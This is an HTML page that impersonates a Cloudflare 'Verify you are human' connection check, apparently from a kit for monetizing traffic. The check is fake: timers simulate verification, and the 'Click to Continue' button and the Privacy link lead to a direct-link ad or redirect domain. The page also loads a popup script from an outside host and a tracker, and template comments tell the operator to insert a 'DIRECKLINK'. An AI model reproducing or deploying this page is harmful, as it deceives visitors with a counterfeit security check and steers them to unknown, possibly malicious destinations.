<!DOCTYPE html>
<html lang="en-US">
  <head>
	  <script src='//m.koncoemu.website/direct-popup.js'/> </script>
    <title>Just a moment...</title>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=Edge" />
    <meta name="robots" content="noindex,nofollow" />
    <meta name="viewport" content="width=device-width,initial-scale=1" />
	<link rel="icon" type="image/x-icon" href="https://img.icons8.com/external-tal-revivo-color-tal-revivo/24/external-cloudflare-provides-content-delivery-network-services-ddos-mitigation-logo-color-tal-revivo.png">
    <link
      href="https://pasteyou.com/cdn-cgi/styles/challenges.css"
      rel="stylesheet"
    />

<!-- Histats.com  START  (aync)-->
<script type="text/javascript">var _Hasync= _Hasync|| [];
_Hasync.push(['Histats.start', '1,4827149,4,3,170,30,00010000']);
_Hasync.push(['Histats.fasi', '1']);
_Hasync.push(['Histats.track_hits', '']);
(function() {
var hs = document.createElement('script'); hs.type = 'text/javascript'; hs.async = true;
hs.src = ('//s10.histats.com/js15_as.js');
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(hs);
})();</script>
<!-- Histats.com  END  -->


    <meta http-equiv="refresh" content="375" />
    <style>
      body {
        margin: 0;
        background-color: #fff;
        padding: 0;
        width: 100%;
        height: 100%;
        overflow: hidden;
        line-height: 17px;
        color: #1d1f20;
        font-family: -apple-system, system-ui, blinkmacsystemfont, "Segoe UI",
          roboto, oxygen, ubuntu, "Helvetica Neue", arial, sans-serif;
        font-size: 14px;
        font-weight: 400;
        -webkit-font-smoothing: antialiased;
        font-style: normal;
      }
      .main-wrapper {
        border-spacing: 0;
      }
      #content {
        display: flex;
        align-items: center;
        justify-content: space-between;
        border: 1px solid #e0e0e0;
        background-color: #fafafa;
        height: 63px;
        width: 305px;
        user-select: none;
      }
      .button {
        background-color: #fafafa;
        height: 50px;
        border: 2px solid #858383;
        border-radius: 3px;
        cursor: pointer;
        transition: all 0.1s ease-in;
      }
      .button:hover {
        scale: 102%;
      }
      #challenge-stage {
        display: flex;
      }
      .ctp-checkbox-container {
        display: flex;
        align-items: center;
        cursor: pointer;
        text-align: left;
      }
      .ctp-checkbox-label {
        cursor: pointer;
        padding-left: 17px;
      }
      .ctp-checkbox-label input {
        position: absolute;
        transition: all 0.1s ease-in;
        z-index: 9999;
        opacity: 0;
        cursor: pointer;
        border: 2px solid #6d6d6d;
        border-radius: 3px;
        background: #fff;
        width: 24px;
        height: 24px;
        animation: scale-up-center 0.4s cubic-bezier(0.55, 0.085, 0.68, 0.53)
          both;
      }
      .ctp-checkbox-label .mark {
        position: absolute;
        transition: all 0.1s ease-in;
        z-index: 9998;
        border: 2px solid #6d6d6d;
        border-radius: 3px;
        background: #fff;
        width: 24px;
        height: 24px;
        animation: scale-up-center 0.4s cubic-bezier(0.55, 0.085, 0.68, 0.53)
          both;
        margin-top: -4px;
      }
      .unspun {
        position: absolute;
        margin-top: -4px;
        width: 24px;
        height: 24px;
      }

      .ctp-checkbox-container {
        display: flex;
        align-items: center;
        cursor: pointer;
        text-align: left;
      }
      .ctp-checkbox-label .mark::after {
        position: absolute;
        border-radius: 5px;
        content: "";
      }
      .ctp-label {
        display: flex;
        flex-flow: row-reverse nowrap;
        align-content: center;
        align-items: center;
        justify-content: flex-end;
        padding-left: 30px;
      }
      #branding {
        display: flex;
        flex-direction: column;
        margin: 0 16px 0 0;
        text-align: right;
        margin-left: 27px;
      }
      #logo {
        margin-bottom: 1px;
        height: 26px;
      }
      #terms {
        display: flex;
        justify-content: space-evenly;
        line-height: 10px;
        color: #1d1f20;
        font-size: 8px;
        font-style: normal;
      }
      #terms a:link,
      #terms a:visited {
        text-decoration: underline;
        line-height: 10px;
        color: #1d1f20;
        font-size: 8px;
        font-weight: 400;
        font-style: normal;
      }
      #terms a {
        text-decoration: underline;
        line-height: 10px;
        color: #1d1f20;
        font-size: 8px;
        font-weight: 400;
        font-style: normal;
      }
      #spinner-icon {
        display: flex;
        margin-right: 8px;
        width: 24px;
        height: 24px;
        animation: rotate 5s linear infinite;
      }
      @keyframes rotate {
        100% {
          transform: rotate(360deg);
        }
      }
      .unspun .circle {
        animation: unspin 0.7s cubic-bezier(0.65, 0, 0.45, 1) forwards;
      }
      .circle {
        stroke-width: 3px;
        stroke-linecap: round;
        stroke: #038127;
        stroke-dasharray: 0, 100, 0;
        stroke-dashoffset: 200;
        stroke-miterlimit: 1;
        stroke-linejoin: round;
      }
      @keyframes unispin {
        40% {
          stroke-width: 1px;
          stroke-linecap: square;
          stroke-dashoffset: 192;
        }

        100% {
          stroke-width: 0;
        }
      }
    </style>
  </head>
  <body class="no-js">
    <div class="main-wrapper" role="main">
      <div class="main-content">
        <h1 class="zone-name-title h1">vercel.app</h1>
        <h2 id="challenge-running" class="h2">
          Checking if the site connection is secure
        </h2>
        <div id="challenge-stage" style="display: flex">
          <div id="turnstile-wrapper" class="captcha-prompt spacer">
            <div>
              <div class="main-wrapper">
                <noscript>
                  <h1 style="color: #bd2426">
                    Please turn JavaScript on and reload the page.
                  </h1>
                </noscript>
                <div
                  id="content"
                  style="display: flex"
                  aria-live="polite"
                  aria-atomic="true"
                >
                  <div id="challenge-stage" style="display: flex">
                    <div
                      class="ctp-checkbox-container"
                      role="alert"
                      style="display: flex"
                    >
                      <label class="ctp-checkbox-label"
                        ><input type="checkbox" id="checkbox" />
                        <span
                          id="mark"
                          class="mark"
                          style="display: none"
                        ></span>
                        <svg
                          id="spinner-icon"
                          viewBox="0 0 30 30"
                          fill="red"
                          xmlns="http://www.w3.org/2000/svg"
                          aria-hidden="true"
                          class="unspun"
                        >
                          <line
                            x1="15"
                            x2="15"
                            y1="1.5"
                            y2="5.5"
                            class="circle"
                          ></line>
                          <line
                            x1="24.5459"
                            x2="24.5459"
                            y1="5.45405"
                            y2="10.45405"
                            transform="rotate(45 24.5459 5.45405)"
                            class="circle"
                          ></line>
                          <line
                            x1="28.5"
                            x2="28.5"
                            y1="15"
                            y2="20"
                            transform="rotate(90 28.5 15)"
                            class="circle"
                          ></line>
                          <line
                            x1="24.5459"
                            x2="24.5459"
                            y1="24.546"
                            y2="29.546"
                            transform="rotate(135 24.5459 24.546)"
                            class="circle"
                          ></line>
                          <line
                            x1="15"
                            x2="15"
                            y1="28.5"
                            y2="33.5"
                            transform="rotate(180 15 28.5)"
                            class="circle"
                          ></line>
                          <line
                            x1="5.4541"
                            x2="5.4541"
                            y1="24.5459"
                            y2="29.5459"
                            transform="rotate(-135 5.4541 24.5459)"
                            class="circle"
                          ></line>
                          <line
                            x1="1.5"
                            x2="1.5"
                            y1="15"
                            y2="20"
                            transform="rotate(-90 1.5 15)"
                            class="circle"
                          ></line>
                          <line
                            x1="5.45408"
                            x2="5.45408"
                            y1="5.45404"
                            y2="10.45404"
                            transform="rotate(-45 5.45408 5.45404)"
                            class="circle"
                          ></line>
                        </svg>
                        <span class="ctp-label"></span>
                      </label>
                    </div>
                  </div>
                  <div
                    id="verifying"
                    class="cb-container"
                    style="display: none"
                  >
                    <div id="verifying-msg">
                      <span id="verifying-text">Verifying...</span>
                    </div>
                  </div>
                  <div
                    id="success"
                    class="cb-container"
                    style="display: none"
                    role="alert"
                  >
                    <svg
                      id="success-icon"
                      xmlns="http://www.w3.org/2000/svg"
                      viewBox="0 0 52 52"
                      aria-hidden="true"
                    >
                      <circle
                        class="success-circle"
                        cx="26"
                        cy="26"
                        r="25"
                      ></circle>
                      <path class="p1" d="m13,26l9.37,9l17.63,-18"></path>
                    </svg>
                    <span id="success-text">Success!</span>
                  </div>
                  <div
                    id="fail"
                    class="cb-container"
                    style="display: none"
                    role="alert"
                  >
                    <svg
                      id="fail-icon"
                      xmlns="http://www.w3.org/2000/svg"
                      viewBox="0 0 52 52"
                      aria-hidden="true"
                    >
                      <circle
                        class="failure-circle"
                        cx="26"
                        cy="26"
                        r="25"
                        fill="none"
                      ></circle>
                      <path
                        class="failure-cross"
                        fill="none"
                        d="M14.1 27.2 l24.124.2"
                      ></path>
                    </svg>
                    <div id="failure-msg">
                      <span id="fail-text">Failure!</span>
                      <br /><span id="fr-helper"
                        ><a href="#refresh" id="fr-helper-link"
                          >Having trouble?</a
                        ></span
                      >
                    </div>
                  </div>
                  <div
                    id="expired"
                    class="cb-container"
                    style="display: none"
                    role="alert"
                  >
                    <svg
                      id="expired-icon"
                      xmlns="http://www.w3.org/2000/svg"
                      viewBox="0 0 52 52"
                      aria-hidden="true"
                    >
                      <circle
                        class="expired-circle"
                        cx="26"
                        cy="26"
                        r="25"
                      ></circle>
                      <path class="expired-p1" d="m13,32l15,0l0,-23"></path>
                    </svg>
                    <div id="expiry-msg">
                      <span id="expired-text">Expired.</span
                      ><a href="#refresh" id="expired-refresh-link">Refresh</a>
                    </div>
                  </div>
                  <div
                    id="challenge-error"
                    class="cb-container"
                    style="display: none"
                    role="alert"
                  >
                    <span id="challenge-error-text"></span>
                  </div>
                  <div id="branding">
                    <a
                      class="cf-link"
                      target="_blank"
                      href="#"
                      rel="noopener noreferrer"
                    >
                      <svg
                        role="img"
                        aria-label="Cloudflare"
                        id="logo"
                        viewBox="0 0 74 25"
                        xmlns="http://www.w3.org/2000/svg"
                      >
                        <path
                          d="M61.8848 15.7841L62.0632 15.1578C62.2758 14.4126 62.1967 13.7239 61.8401 13.2178C61.5118 12.7517 60.9649 12.4773 60.3007 12.4453L47.7201 12.2836C47.6811 12.2829 47.6428 12.2728 47.6083 12.2542C47.5738 12.2356 47.5442 12.209 47.5217 12.1766C47.4996 12.1431 47.4856 12.1049 47.4807 12.0649C47.4758 12.025 47.4801 11.9844 47.4933 11.9465C47.5149 11.8839 47.5541 11.8291 47.6061 11.7888C47.658 11.7486 47.7204 11.7247 47.7856 11.72L60.4827 11.5566C61.9889 11.4864 63.6196 10.2462 64.1905 8.73372L64.9146 6.81361C64.9443 6.73242 64.951 6.64444 64.9341 6.55957C64.112 2.80652 60.8115 0 56.8652 0C53.2293 0 50.1421 2.38158 49.0347 5.69186C48.2864 5.12186 47.3535 4.85982 46.4228 4.95823C44.6785 5.13401 43.276 6.55928 43.1034 8.32979C43.059 8.77189 43.0915 9.21845 43.1992 9.64918C40.3497 9.73347 38.0645 12.1027 38.0645 15.0151C38.0649 15.2751 38.0838 15.5347 38.1212 15.7919C38.1294 15.8513 38.1584 15.9057 38.2029 15.9452C38.2474 15.9847 38.3044 16.0067 38.3635 16.0071L61.5894 16.0099C61.5916 16.0101 61.5938 16.0101 61.596 16.0099C61.6616 16.0088 61.7252 15.9862 61.7772 15.9455C61.8293 15.9049 61.867 15.8483 61.8848 15.7841Z"
                          fill="#F6821F"
                        ></path>
                        <path
                          d="M66.0758 6.95285C65.9592 6.95285 65.843 6.95582 65.7274 6.96177C65.7087 6.96312 65.6904 6.96719 65.6729 6.97385C65.6426 6.98437 65.6152 7.00219 65.5931 7.02579C65.5711 7.04939 65.555 7.07806 65.5462 7.10936L65.0515 8.84333C64.8389 9.58847 64.918 10.2766 65.2749 10.7827C65.6029 11.2494 66.1498 11.5233 66.814 11.5552L69.4959 11.7186C69.5336 11.7199 69.5705 11.73 69.6037 11.7483C69.6369 11.7666 69.6654 11.7925 69.687 11.8239C69.7092 11.8576 69.7234 11.896 69.7283 11.9363C69.7332 11.9765 69.7288 12.0173 69.7153 12.0555C69.6937 12.118 69.6546 12.1727 69.6028 12.2129C69.5509 12.2531 69.4887 12.2771 69.4236 12.2819L66.6371 12.4453C65.1241 12.5161 63.4937 13.7558 62.9233 15.2682L62.722 15.8022C62.7136 15.8245 62.7105 15.8486 62.713 15.8724C62.7155 15.8961 62.7236 15.9189 62.7365 15.9389C62.7495 15.9589 62.7669 15.9755 62.7874 15.9873C62.8079 15.9991 62.8309 16.0058 62.8544 16.0068C62.8569 16.0068 62.8592 16.0068 62.8618 16.0068H72.4502C72.506 16.0073 72.5604 15.9893 72.6051 15.9554C72.6498 15.9216 72.6823 15.8739 72.6977 15.8195C72.8677 15.2043 72.9535 14.5684 72.9529 13.9296C72.9517 10.0767 69.8732 6.95285 66.0758 6.95285Z"
                          fill="#FBAD41"
                        ></path>
                        <path
                          class="logo-text"
                          d="M8.11963 18.8904H9.75541V23.4254H12.6139V24.8798H8.11963V18.8904Z"
                        ></path>
                        <path
                          class="logo-text"
                          d="M14.3081 21.9023V21.8853C14.3081 20.1655 15.674 18.7704 17.4952 18.7704C19.3164 18.7704 20.6653 20.1482 20.6653 21.8681V21.8853C20.6653 23.6052 19.2991 24.9994 17.4785 24.9994C15.6578 24.9994 14.3081 23.6222 14.3081 21.9023ZM18.9958 21.9023V21.8853C18.9958 21.0222 18.3806 20.2679 17.4785 20.2679C16.5846 20.2679 15.9858 21.0038 15.9858 21.8681V21.8853C15.9858 22.7484 16.6013 23.5025 17.4952 23.5025C18.3973 23.5025 18.9958 22.7666 18.9958 21.9023Z"
                        ></path>
                        <path
                          class="logo-text"
                          d="M22.6674 22.253V18.8901H24.3284V22.2191C24.3284 23.0822 24.7584 23.4939 25.4159 23.4939C26.0733 23.4939 26.5034 23.1003 26.5034 22.2617V18.8901H28.1647V22.2093C28.1647 24.1432 27.0772 24.9899 25.3991 24.9899C23.7211 24.9899 22.6674 24.1268 22.6674 22.2522"
                        ></path>
                        <path
                          class="logo-text"
                          d="M30.668 18.8907H32.9445C35.0526 18.8907 36.275 20.1226 36.275 21.8508V21.8684C36.275 23.5963 35.0355 24.88 32.911 24.88H30.668V18.8907ZM32.97 23.4076C33.9483 23.4076 34.597 22.8609 34.597 21.8928V21.8759C34.597 20.9178 33.9483 20.3614 32.97 20.3614H32.3038V23.4082L32.97 23.4076Z"
                        ></path>
                        <path
                          class="logo-text"
                          d="M38.6525 18.8904H43.3738V20.3453H40.2883V21.3632H43.079V22.7407H40.2883V24.8798H38.6525V18.8904Z"
                        ></path>
                        <path
                          class="logo-text"
                          d="M45.65 18.8904H47.2858V23.4254H50.1443V24.8798H45.65V18.8904Z"
                        ></path>
                        <path
                          class="logo-text"
                          d="M54.4187 18.8475H55.9949L58.5079 24.8797H56.7541L56.3238 23.8101H54.047L53.6257 24.8797H51.9058L54.4187 18.8475ZM55.8518 22.5183L55.1941 20.8154L54.5278 22.5183H55.8518Z"
                        ></path>
                        <path
                          class="logo-text"
                          d="M60.6149 18.8901H63.4056C64.3083 18.8901 64.9317 19.13 65.328 19.5406C65.6742 19.883 65.8511 20.3462 65.8511 20.9357V20.9526C65.8511 21.8678 65.3691 22.4754 64.6369 22.7919L66.045 24.88H64.1558L62.9671 23.0658H62.2507V24.88H60.6149V18.8901ZM63.3299 21.7654C63.8864 21.7654 64.2071 21.4915 64.2071 21.0551V21.0381C64.2071 20.5674 63.8697 20.328 63.3211 20.328H62.2507V21.7665L63.3299 21.7654Z"
                        ></path>
                        <path
                          class="logo-text"
                          d="M68.2112 18.8904H72.9578V20.3024H69.8302V21.209H72.6632V22.5183H69.8302V23.4683H73V24.8798H68.2112V18.8904Z"
                        ></path>
                        <path
                          class="logo-text"
                          d="M4.53824 22.6043C4.30918 23.13 3.82723 23.5022 3.18681 23.5022C2.29265 23.5022 1.67746 22.7493 1.67746 21.8851V21.8678C1.67746 21.0047 2.27593 20.2676 3.1698 20.2676C3.84367 20.2676 4.35681 20.6882 4.5734 21.2605H6.29764C6.02151 19.8349 4.78716 18.7707 3.18681 18.7707C1.36533 18.7707 0 20.1666 0 21.8851V21.9021C0 23.6219 1.3486 25 3.1698 25C4.72762 25 5.94525 23.9764 6.26645 22.6046L4.53824 22.6043Z"
                        ></path>
                      </svg>
                    </a>
                    <div id="terms">
                      <!--- CHANGE # TO YOUR DIRECKLINK -->
                      <a
                        id="privacy-link"
                        target="_blank"
                        rel="noopener noreferrer"
                        href="https://threefortressfork.com/whsawky0h1?key=69892f2fbda68faef75c73101f7950e1"
                        >Privacy</a
                      ><span class="link-spacer"> • </span>
                      <!--- CHANGE # TO YOUR DIRECKLINK -->
                      <a
                        id="terms-link"
                        target="_blank"
                        rel="noopener noreferrer"
                        href="#"
                        >Terms</a
                      >
                    </div>
                  </div>
                </div>
              </div>
              <input
                type="hidden"
                name="cf-turnstile-response"
                id="cf-chl-widget-2pwc7_response"
              />
            </div>
          </div>
        </div>
        <div
          id="challenge-spinner"
          class="spacer loading-spinner"
          style="display: none; visibility: hidden"
        >
          <div class="lds-ring">
            <div></div>
            <div></div>
            <div></div>
            <div></div>
          </div>
        </div>
        <div id="challenge-body-text" class="core-msg spacer">
          we needs to review the security of your connection before proceeding.
        </div>
        <div id="challenge-success" style="display: none">
          <div class="h2">
            <span class="icon-wrapper"
              ><img
                class="heading-icon"
                alt="Success icon"
                src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADQAAAA0CAMAAADypuvZAAAANlBMVEUAAAAxMTEwMDAxMTExMTEwMDAwMDAwMDAxMTExMTExMTEwMDAwMDAxMTExMTEwMDAwMDAxMTHB9N+uAAAAEXRSTlMA3zDvfyBAEJC/n3BQz69gX7VMkcMAAAGySURBVEjHnZZbFoMgDEQJiDzVuv/NtgbtFGuQ4/zUKpeMIQbUhXSKE5l1XSn4pFWHRm/WShT1HRLWC01LGxFEVkCc30eYkLJ1Sjk9pvkw690VY6k8DWP9OM9yMG0Koi+mi8XA36NXmW0UXra4eJ3iwHfrfXVlgL0NqqGBHdqfeQhMmyJ48WDuKP81h3+SMPeRKkJcSXiLUK4XTHCjESOnz1VUXQoc6lgi2x4cI5aTQ201Mt8wHysI5fc05M5c81uZEtHcMKhxZ7iYEty1GfhLvGKpm+EYkdGxm1F5axmcB93DoORIbXfdN7f+hlFuyxtDP+sxtBnF43cIYwaZAWRgzxIoiXEMESoPlMhwLRDXeK772CAzXEdBRV7cmnoVBp0OSlyGidEzJTFq5hhcsA5388oSGM6b5p+qjpZrBlMS9xj4AwXmz108ukU1IomM3ceiW0CDwHCqp1NjAqXlFrbga+xuloQJ+tuyfbIBPNpqnmxqT7dPaOnZqBfhSBCteJAxWj58zLk2xgg+SPGYM6dRO6WczSnIxxwEExRaO+UyCUhbOp7CGQ+kxSUfNtLQFC+Po29vvy7jj4y0yAAAAABJRU5ErkJggg==" /></span
            >Connection is secure
          </div>
          <div class="core-msg spacer">Proceeding...</div>

          <!--- CHANGE # TO YOUR DIRECKLINK -->
          <a href="https://threefortressfork.com/whsawky0h1?key=69892f2fbda68faef75c73101f7950e1">
            <button class="button" style="padding: 10px 20px">
              Click to Continue
            </button>
          </a>
        </div>

        <noscript
          ><div id="challenge-error-title">
            <div class="h2">
              <span class="icon-wrapper"
                ><div class="heading-icon warning-icon"></div></span
              ><span id="challenge-error-text"
                >Enable JavaScript and cookies to continue</span
              >
            </div>
          </div></noscript
        >
      </div>
    </div>
    <script>
      document.addEventListener("DOMContentLoaded", function () {
        // Simulasikan pengambilan data atau tugas yang memakan waktu
        setTimeout(function () {
          document.querySelector(".ctp-label").textContent =
            "Verify you are human";
          document.querySelector(".ctp-checkbox-label").style.display = "block";
          document.querySelector("#spinner-icon").style.display = "none";
          document.querySelector(".mark").style.display = "block";
        }, 2000); // Ganti dengan waktu yang sesuai dengan kebutuhanmu
        document.querySelector(".ctp-label").textContent = "Verifying...";

        function showLoader() {
          document.querySelector("#spinner-icon").style.display = "block";
          document.querySelector(".mark").style.display = "none";
          document.querySelector(".ctp-label").textContent = "Verifying...";

          // Simulasikan tugas yang memakan waktu
          setTimeout(function () {
            document.querySelector(".ctp-checkbox-label").style.display =
              "block";
            document.querySelector("#spinner-icon").style.display = "none";
            document.querySelector("#content").style.display = "none";
            document.querySelector("#challenge-body-text").style.display =
              "none";
            document.querySelector("#challenge-success").style.display =
              "block";
            document.querySelector("#challenge-running").style.display = "none";
            document.querySelector("#challenge-stage").style.display = "none";
          }, 2000); // Ganti dengan waktu yang sesuai dengan kebutuhanmu
        }
        document
          .getElementById("checkbox")
          .addEventListener("click", showLoader);
      });
    </script>
	  
  </body>
</html>
